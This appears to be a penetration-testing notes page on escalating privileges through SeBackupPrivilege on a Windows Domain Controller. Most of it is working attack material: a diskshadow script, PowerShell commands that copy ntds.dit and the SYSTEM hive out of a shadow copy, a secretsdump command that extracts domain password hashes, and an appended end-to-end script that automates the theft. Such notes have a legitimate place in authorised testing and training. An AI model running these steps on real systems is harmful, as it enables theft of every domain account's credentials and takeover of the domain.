In the Open

SeBackupPrivilege Escalation

  • Check the current user's privileges to see whether there is a path to escalate
  • Run whoami /priv (or whoami /all)
  • SeBackupPrivilege must be listed. It is normally shown as Disabled; that is fine, the cmdlets below enable it on the token. Members of Backup Operators hold it by default
  • The helper DLLs and this technique are documented in PayloadsAllTheThings
  • Upload diskshadow.txt to the target with the following content. Every line, including the last, must end with a trailing space, otherwise diskshadow does not parse the script correctly
set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
expose %someAlias% h: 
  • Change directory to C:\Windows\System32 and run diskshadow.exe /s C:\tmp\diskshadow.txt. This snapshots the C: volume and exposes the shadow copy as drive H:, where ntds.dit is not locked
  • Upload the two DLLs to the target, then from PowerShell import them and copy ntds.dit out of the shadow copy (the live copy is locked by the directory service, which is why the snapshot is needed). Save the SYSTEM hive as well; its boot key is required to decrypt the hashes in ntds.dit. Note that ntds.dit only exists on a Domain Controller
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -Overwrite
reg save HKLM\SYSTEM C:\tmp\system
  • Download ntds.dit and system to the attacking machine
  • Extract the hashes with Impacket's secretsdump.py: secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
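The target-side steps above, strung together as one PowerShell script. This is an added example, not part of the original notes or of the SeBackupPrivilege project. It assumes the two DLLs have already been uploaded to C:\tmp, that the target is a Domain Controller (so ntds.dit exists in the snapshot), that drive letter H: is free, and that the script runs in a PowerShell session of the user holding SeBackupPrivilege; the variable names and the sanity checks are mine.

```powershell
# Added example (not from the original notes): runs the SeBackupPrivilege
# steps end to end on the target. Assumes the helper DLLs are in C:\tmp,
# the host is a Domain Controller and H: is an unused drive letter.
$WorkDir     = 'C:\tmp'   # assumed staging directory
$ShadowDrive = 'h:'       # assumed free drive letter for the shadow copy

# 1. Confirm the token actually holds SeBackupPrivilege.
#    "Disabled" in the whoami output is fine: the cmdlets enable it.
$privs = whoami /priv
if (-not ($privs -match 'SeBackupPrivilege')) {
    throw 'SeBackupPrivilege is not held by this token; nothing to do.'
}

New-Item -ItemType Directory -Path $WorkDir -Force | Out-Null

# 2. Write the diskshadow script. Every line needs a trailing space, so it is
#    appended explicitly instead of relying on an editor to preserve it.
$lines = @(
    "set metadata $WorkDir\tmp.cabs",
    'set context persistent nowriters',
    'add volume c: alias someAlias',
    "expose %someAlias% $ShadowDrive"
) | ForEach-Object { $_ + ' ' }
$scriptPath = Join-Path $WorkDir 'diskshadow.txt'
[System.IO.File]::WriteAllLines($scriptPath, $lines, [System.Text.Encoding]::ASCII)

# 3. Run diskshadow from System32 as the notes do. It snapshots C: and
#    exposes the shadow copy as H:.
Push-Location C:\Windows\System32
try {
    diskshadow.exe /s $scriptPath | Out-Null
} finally {
    Pop-Location
}

$ntdsInShadow = "$ShadowDrive\Windows\NTDS\ntds.dit"
if (-not (Test-Path $ntdsInShadow)) {
    throw "No ntds.dit under $ShadowDrive; shadow copy not exposed or host is not a DC."
}

# 4. Import the helper cmdlets and copy ntds.dit out of the snapshot.
#    The copy bypasses the file ACL by enabling SeBackupPrivilege on the token.
Import-Module (Join-Path $WorkDir 'SeBackupPrivilegeUtils.dll')
Import-Module (Join-Path $WorkDir 'SeBackupPrivilegeCmdLets.dll')
Copy-FileSeBackupPrivilege $ntdsInShadow (Join-Path $WorkDir 'ntds.dit') -Overwrite

# 5. Save the SYSTEM hive; its boot key decrypts the hashes stored in ntds.dit.
#    /y overwrites a previous copy without prompting.
reg save HKLM\SYSTEM (Join-Path $WorkDir 'system') /y | Out-Null

# 6. Sanity check before exfiltration: both files must exist and be non-empty.
#    A zero-byte ntds.dit means the copy silently failed.
Get-Item (Join-Path $WorkDir 'ntds.dit'), (Join-Path $WorkDir 'system') |
    Select-Object Name, Length
```

After transferring the two files off the box, the extraction step runs unchanged on the attacking machine. Once the files are out, the snapshot can be torn down from diskshadow with `unexpose h:` followed by `delete shadows all`; leaving a persistent, exposed shadow copy behind is both noisy and unnecessary.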